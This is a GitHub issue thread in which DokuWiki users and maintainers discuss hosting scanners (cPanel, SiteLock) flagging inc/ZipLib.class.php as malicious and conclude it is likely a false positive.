cPanel 11.52.2.4 found "malicious" strings at /inc/ZipLib.class.php

[miguelmenendez]

cPanel 11.52.2.4 found "malicious" strings at /inc/ZipLib.class.php

For DokuWiki 2015-08-10a "Detritus" & 2016-04-02 "snapshot".

PHP-EVAL_REQUEST-augq.UNOFFICIAL FOUND

cPanel block outbound ports 80, 443, 587 and 465 for all accounts hosting DokuWiki.

No more info.

[Klap-in]

This is the file you mentioned: https://github.com/splitbrain/dokuwiki/blob/master/inc/ZipLib.class.php
I don't see anything remarkable in it. Do you have pointers were the issue should be?

Are you sure you have still the original files on the server? (don't compare dates, but compare the files with a new downloaded version)

[Klap-in]

@miguelmenendez:

• Do you have more info about this?
• From where do you have your download of DokuWiki?

Is there anything that has to be checked from the our side?
The downloads at download.dokuwiki.org are generated directly from git?

[chinnz25]

My Hosting Provider also issuing such warning & blocked Port 80. Iam updating via Softaculous!
Below I have attached the Screenshots.

[Klap-in]

You are sure that your inc/ZipLib.class.php is exactly the same as https://github.com/splitbrain/dokuwiki/blob/master/inc/ZipLib.class.php ?

If the code is equal to our code, could you ask the support team that sent you this message if they can tell which part of the code is triggering this warning in the scan?
So far we know our code is correct and not malicious. So the big question is: what does this scan not like?

[brianoflan]

I have seen this same error from hosting sites that scan files with SiteLock:

inc/ZipLib.class.php: SiteLock-PHP-EVAL_REQUEST-auht.UNOFFICIAL FOUND

(The suffix after SiteLock-PHP-EVAL_REQUEST- varies, augq or auht or ete and so on.)

By its name it seems like it would have something to do with https://www.owasp.org/index.php/Direct_Dynamic_Code_Evaluation_('Eval_Injection')
but nothing close to the examples listed there match this file.

It seems clear that it is a false positive, either from the strings of hex/binary data - or else from having the gzinflate function in it at all (per https://blog.sitelock.com/2016/08/how-to-look-for-malware-in-your-databases/ ?) - or from who-knows-what. The SiteLock scan doesn't offer a line number or specifics - and most admins running a hosting site will just ask you to remove the ZipLib.class.php file (they don't know how SiteLock works; they just run it and tell their customers they've been "hacked").

https://blog.sitelock.com/2012/08/how-to-find-injected-malware-in-a-wordpress-website/
https://blog.sitelock.com/2015/03/malware-uncovered-what-infecting-a-website-actually-looks-like/

[lpaulsen93]

I understood that it is a false positive. Anyway, the root of the message seems to be the ZipLib. As it will be removed from DokuWiki with the next release "Frusterick Manners" maybe this issue can be closed?